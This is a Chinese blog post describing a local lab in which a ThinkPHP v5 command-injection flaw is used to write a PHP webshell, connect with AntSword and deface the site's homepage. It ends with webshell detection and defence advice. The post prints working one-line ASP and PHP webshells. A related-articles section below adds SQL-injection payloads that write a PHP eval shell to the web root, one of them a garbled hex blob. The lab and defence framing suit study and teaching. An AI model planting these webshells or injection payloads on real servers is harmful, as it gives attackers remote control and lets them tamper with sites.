搭建网站模拟webshell写入

已于 2022-08-13 12:05:54 修改
阅读量582 收藏 1
点赞数
分类专栏: 攻防类 文章标签: php 服务器 网络
于 2022-08-13 11:52:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46412408/article/details/126317479
版权

声明:本文仅限交流学习使用,请勿使用在任何非法商业活动,禁止用于非法用途。否则后果自负。如有侵权,请告知删除,谢谢!

搭建网站模拟webshell写入。

“web”的含义是显然需要服务器开放web服务,“shell”的含义是取得对服务器某种程度上操作命令。webshell主要用于网站和服务器管理,由于其便利性和功能强大,被特别修改后的webshell也被部分人当作网站后门工具使用

常见的shell

asp:

<%eval request("cmd")% >

php:

<?php

$a=exec($_GET["input"]);

echo $a;

?>
<?php @eval($_POST['c']);?>   #本次用到,c为蚁剑连接密码

实现过程:

在物理机上搭建网站,实现对网站写入webshell,并用菜刀连接木马,从而对门户网站信息篡改,获取门户网站的敏感信息。

在php搭建一个网站(网站包要放在php安装目录下的WWW文件下)

创建网站,配置网站域名和根目录。

在www下看一下是否有刚刚创建的网站包

在小皮面板刚刚创建的网站名,点击管理>>打开网站

使用后台目录扫描工具对网站目录进行扫描,可以看到存在public目录。双击进入网页

存在thinkphp v5的一个框架

在public目录下执行php请求参数命令(将whoami换成ipconfig观察回显报错,说明命令注入成功)观察到ipconfig后是cmd查看网卡信息是一样的,说明可以通过命令来执行一些操作。

下一步就是在public目录下通过请求参数去写入shell,攻击者上传Webshell后,往往还会执行进一步的操作,如提权、添加用户、写入系统后门等,实现持久化驻留。

回显没有报错就说明写入成功

通过蚁剑连接shell

连接成功

双击进入到文件目录找到文件根目录下的index.php文件双击进去,可以对门户网站的页面信息进行篡改

这一部分就是更换门户网站的主页图片

应急处置:

判断是否被植入webshell

对日志进行分析,严格管理权限,排查网站可能存在的漏洞,使用河马查杀webshell,使用wireshark抓包工具捕获网络流量并进行分析。

Webshell防御方法:

·配置必要的防火墙,并开启防火墙策略,防止暴露不必要的服务为攻击者提供利用条件。

·对服务器进行安全加固,例如,关闭远程桌面功能、定期更换密码、禁止使用最高权限用户运行程序、使用 HTTPS 加密协议等。

·加强权限管理,对敏感目录进行权限设置,限制上传目录的脚本执行权限,不允许配置执行权限等。

·安装 Webshell 检测工具,根据检测结果对已发现的可疑 Webshell 痕迹立即隔离查杀,并排查漏洞。

·排查程序存在的漏洞,并及时修补漏洞。可以通过专业人员的协助排查漏洞及入侵原因。

时常备份数据库等重要文件。

·需要保持日常维护,并注意服务器中是否有来历不明的可执行脚本文件。

·采用白名单机制上传文件,不在白名单内的一律禁止上传,上传目录权限遵循最小权限原则。

网安初学人
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网站后台拿Webshell
01-13
通过注入或者其他途径,获取网站管理员账号和密码后,找到后台登录地址,登录后,寻找后台漏洞上传网页后门,获取网站webshell webshell的作用是方便攻击者,webshell是拥有fso权限,根据fso权限的不用,可以对网页进行编辑删除,上传或者下载,查看文件 攻击者也可以通过这个webshell服务器进行提权,提权成功后,会得到服务器管理权限。拿webshell也是getshell的另一种叫法。
如何上传WEBSHELL思路
12-26
如何上传WEBSHELL思路 如何上传WEBSHELL思路 如何上传WEBSHELL思路
一次靶机写入webshell的几种方式
最新发布
u2943013702的博客
04-16 793
访问该路径,自动下载了www.zip文件,打开查看是网站的源码,那么这个应该是网站的备份源码,不知道是那个管理员放在了网站根目录,在源码的配置文件里得到了数据库的root和密码。数据库管理phpmyadmin后台拿到shell的方法有两种,一种是into outfile 直接写入,一种是通过日志写入。接下来按照传统的思想,查找表名,查找列,最后得到了网站管理员的账号和密码。这是一个由phpstudy搭建的站点的网站,尝试构造默认的网站根目录。更改路径为我们得到的绝对路径,也就是写入shell文件的位置。
php.rar_webshell_网站 搜索功能
09-14
php类型的webshell,包括目录查询、相同网站搜索、弱口令搜索等功能,
mysql数据写入突然慢了_通过MySQL写入webshell的几种方式
weixin_39648824的博客
11-28 289
当我们通过测试发现SQL注入,或拿到像phpMyAdmin之类的web数据库可视化管理工具,并想要进行下一步渗透的时候,可通过数据库写入webshell到目标服务器上,利用webshell管理工具控制目标服务器。下面将讲述几个通过MySQL数据库写入webshell的方法,以拿到phpMyAdmin为例。-01-通过outfile写入shell利用条件:1、root权限2、网站的绝对路径...
SSRF+redis写入webshell
qq_43665434的博客
04-03 1485
晓看红湿处,花重锦官城。 实验环境 主机 角色 描述 centos 受害服务器 运行redis和web服务(redis未授权访问) window 跳板服务器 含有ssrf漏洞 kali 攻击者 利用ssrf和redis未授权访问写入webshell 实验准备 思路: 构造redis数据包,利用redis的数据备份功能,将webshell写入目标服务器(centos)的网站根目录下,然后用菜刀连接获取shell。 条件: 1、运行redis服务的用户必须具有在网站根目录下写入
webshell生成器
12-30
本工具,可以直接生成WEBSHELL和提权用的文件。
就这么简单!构建强大的WebShell防护体系
dfdhxb995397的博客
12-06 229
接触web安全中,例如上传一句话WebShell实现上传文件的功能,再通过上传的多功能WebShell,执行病毒文件最终创建远程连接账号,达到入侵目标服务器的效果。我们可以看到,webshell在整个过程中起到了决定性的作用,因此对WebShell的防御是Web安全防御体系中非常重要的一部分。那么如何构建强大的WebShell防护体系呢? 以下内容,从上传、文件写入和浏览三个方面...
webshell箱子】webshell箱子 搭建过程,使用方法,附带所需的下载链接
03-31 1647
人在做天在看,举头三尺有神明
造自己的WEBSHELL黑匣子
lcdqqq的博客
11-16 1412
造自己的Webshell黑匣子! 玩过sql注入,暴库,使用过小榕WIS+WED,NBSI自动注入工具.等等. 通过各种脚本攻击方,大家一定拿下了不少网站, 上传了各种类型的网页木马了吧? -------------------------------------------------------- 1.快速的获取大量的Webshell 也许有不少朋友还没有玩
linux webshell 页面管理,instantbox:30s内快速搭建可通过webshell管理的Linux系统
weixin_35326667的博客
05-13 446
点击上方蓝色字体,关注我们 如何快速搭建一个Linux环境,肯定非docker莫属。但通过instantbox,可以带给我们比docker更好的体验:在不到 30s 内快速搭建一个干净、开箱即用的多个临时的Linux 系统,如Ubuntu、Centos、Arch、Debian、Fedroa、Alpine;通过Web界面分配宿主机资源并创建Linux系统;设置容器存活时间;安装instantbox...
webshellmonitor 网站webshell监测
10-21
webshellmonitor 网站webshell监测。。。。。。。。。。。。。。。
网站木马Webshell扫描器webshellscanner
04-27
Webshell扫描扫描,可以自动扫描服务器上所有的webshell,感觉还可以,
网站webshell_经典全集.doc
10-17
网站webshell_经典全集.doc
命令执行漏洞多种写入webshell方式总结
Thunderclap的博客
02-24 2530
, 这些字符与双引号一起使用时具有特殊含义,并且在显示之前对其进行评估。单引号中的任何字符都没有特殊含义, 当你不想使用转义字符来更改 shell 脚本解释输入字符串参数方式时,就会很方便。简而言之,shell 将逐字解释单引号内的封闭文本,并且不会插入任何内容,包括变量、反引号、某些 \ 转义符等。在windows中,批处理需要转义字符主要有 “&”,“|”,“”等等,转义字符为”^”在Linux中,需要转义字符主要是 单引号 或者双引号 对于单引号,我们将其替换为\47即可。
使用纯Java实现一个WebSSH项目
热门推荐
Object的博客
03-10 1万+
使用纯Java语言实现的WebSSH项目。 技术:SpringBoot+WebSockey+jsch+xterm.js
webshell php 教程,技术分享丨phpMyAdmin 常见写入webshell的方法(二)
weixin_39844963的博客
03-17 178
六.CVE-2018-19968 phpmyadmin文件包含getshell环境搭建:在线环境VulnSpy已为大家提供在线phpMyAdmin环境地址:https : //www.vsplate.com/?github = vulnspy/phpmyadmin-4.8.1,单击又上角的START TO HACK按钮可进行在线测试。也可以选择自行到phpmyadmin官网下载对应版本。利用条件...
文件上传--webshell
qq_37051023的博客
11-12 1592
1、webshell---服务器端可执行的脚本文件(命令解释器),以web的方式执行shellshell类似cmd.exe linux的bash等)------总结一句话,以web方式可以达到系统命令解释器的效果文件 webshell分为三类:小马、大马、一句话木马 ...
命令执行写Webshell总结
hackzkaq的博客
07-20 4538
更多渗透技能 ,10余本电子书及渗透工具包,搜公众号:白帽子左一 前言 当我们找到一个rce漏洞却无法反弹shell时,在web路径写webshell用连接工具进行管理会方便的多,本文总结从命令执行到webshell的流程化操作。 寻找web路径 写webshell当然要写在web路径,第一步要做的就是快速寻找web路径 1.文件查找法 一般web路径一定会有index.html\php\jsp\asp,login.xxx文件。可以根据已知页面文件名全局搜索 linux: find / -name ind
sql注入写入webshell
06-28
### 回答1: SQL注入是一种攻击技术,可以利用应用程序中存在的漏洞,将恶意的SQL代码注入到应用程序中,从而获取应用程序的控制权。如果攻击者成功地注入了SQL代码,他们可以执行任意操作,包括写入WebshellWebshell是一种恶意代码,可以在受攻击的服务器上创建一个远程访问接口,允许攻击者执行任意命令。攻击者可以使用Webshell来窃取敏感数据、破坏系统、或者在服务器上安装其他恶意软件。 要利用SQL注入写入Webshell,攻击者需要找到一个易受攻击的应用程序,并利用应用程序中存在的漏洞注入恶意的SQL代码。一旦注入成功,攻击者可以使用SQL语句来创建一个Webshell文件,并将其写入服务器上的某个目录中。然后,攻击者可以使用Webshell来执行任意命令,包括上传和下载文件、执行系统命令、或者修改文件权限等操作。 为了防止SQL注入攻击,应用程序开发人员应该采取一系列措施,包括使用参数化查询、过滤用户输入、限制数据库用户的权限等。此外,管理员还应该定期检查服务器上的文件和目录,以确保没有Webshell存在。 ### 回答2: 什么是SQL注入? SQL注入是一种攻击方式,用于通过对应用程序中的输入进行恶意注入,从而访问或与应用程序中的数据库进行交互。SQL注入通常利用应用程序的输入验证不严格,以及对数据库中的数据进行不安全的查询和处理,从而访问和操纵数据库。 什么是webshellWebshell是一种特殊的程序代码,可以通过Web接口进行访问和控制,可以给攻击者带来权限最高的系统操作权限。 如何通过SQL注入写入webshell? 攻击者通过SQL注入可以执行许多操作,包括获取或修改数据库中的数据,但更加危险的是可以通过写入webshell来获得对目标系统的完全控制。下面是一些通用的示例,介绍如何通过SQL注入外部攻击者写入webshell。 1. 通过UNICODE编码的方式写入webshell 攻击者可以通过在URL字符串中使用UNICODE编码来伪装恶意SQL注入代码,以此来避开Web应用程序的过滤器和安全防护措施。例如,攻击者可以使用以下语句,将webshell写入到一个包含BLOB类型的表中: ' UNION SELECT NULL, CAST(0x3C3F706870206576616C28245F5053545B312D31293B206966202869736572727065723F246F75745B315D290A7B2473797374656D3D2170737465725F6765745F636F6E74656E74735F75726C28293B2024746578743D2473797374656D5B31293B2073656E64286F62636F645B2272657175657374225D2E6"9"6"5"76616C285F504F53545B225F716"5"56"1"225D293B290A3F3E0A0A, NULL-- 此代码将webshell写入到一个表中,并通过使用PHP代码,能使其在服务器上运行。 2. 在注入点创建一个新表,并将webshell写入其中 攻击者可以通过多个SQL注入绕过过滤和检测,创建一个新的表并将webshell写入其中。例如,下面的代码可以被绕过,从而创建一个新的表: ' UNION SELECT NULL, 'CREATE TABLE webshell (id INT, shell text); INSERT INTO webshell(id, shell) VALUES (1,<?php eval($_POST[0]); ?>);' INTO OUTFILE '/var/www/html/new.txt'-- 此代码创建了一个新表“webshell”,其中包含列“id”和“shell”,并将webshell写入到以BLOB类型存储的“shell”列中。 3. 在目标服务器上创建一个外部表,并将webshell写入其中 攻击者还可以通过创建一个外部表,在连接到目标服务器时抓取webshell。例如,攻击者可以构建以下SQL语句以在目标服务器上创建名为“webshell”的外部表: CREATE TABLE webshell (id INT, shell text); INSERT INTO webshell(id, shell) VALUES (1, '<?php eval($_POST[0]); ?>'); 然后,攻击者可以请求一个可以对此表进行操作的URL: ' UNION SELECT NULL,'/var/www/html/?id=(SELECT GROUP_CONCAT(CONCAT(id,0x2C,shell),0x0A) FROM mysql.external_table WHERE table_name="webshell")' INTO OUTFILE '/var/www/html/output.txt'-- 该URL将在服务器上抓取webshell,并将其输出到/var/www/html/output.txt。攻击者现在可以从该位置获取完整的webshell,以便执行任意系统命令。 总结 SQL注入是一种令人不安的攻击方式,可以使黑客绕过应用程序的安全控制,从而访问和操纵系统中的数据。写入webshell是SQL注入的最危险的结果之一,它允许黑客完全控制目标系统和数据。要保护Web应用程序免受SQL注入和其他攻击的威胁,建议采取一系列安全措施,包括在应用程序代码中实施更强大的输入验证和防御措施,利用Web应用程序防火墙和安全扫描器,以及升级和更新应用程序及其相关软件以减少漏洞和缺陷的风险。 ### 回答3: SQL注入是一种攻击技术,攻击者利用这种技术可以将恶意负载注入到应用程序的数据库中,包括写入webshell,从而获取系统控制权和敏感数据。SQL注入攻击是因为应用程序没有正确的验证用户输入数据而造成的。 SQL注入攻击者通过在应用程序的输入字段中输入特殊字符或语句,从而执行恶意SQL语句来覆盖或篡改应用程序的数据库。攻击者可以利用这个漏洞来写入webshell,从而获取远程访问到受害者的系统。 webshell是一种恶意软件,攻击者可以在受害者的主机上进行远程控制。攻击者可以利用webshell来窃取敏感信息、执行命令、上传或下载文件等操作。 攻击者通常会在注入恶意负载后,通过脚本或工具上传或执行webshell。一旦攻击者成功地写入webshell,他就可以通过浏览器或其他工具来远程控制受害者的系统。 为了防止SQL注入攻击,应用程序必须实施有效的数据验证和过滤,从而限制用户输入的字符和语句。此外,安装和更新防病毒和防火墙软件也是非常重要的。其他防御措施还包括使用安全套接字层(SSL)来加密数据传输,使用预编译语句来包含应用程序的数据查询,以及限制数据库用户的访问权限。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值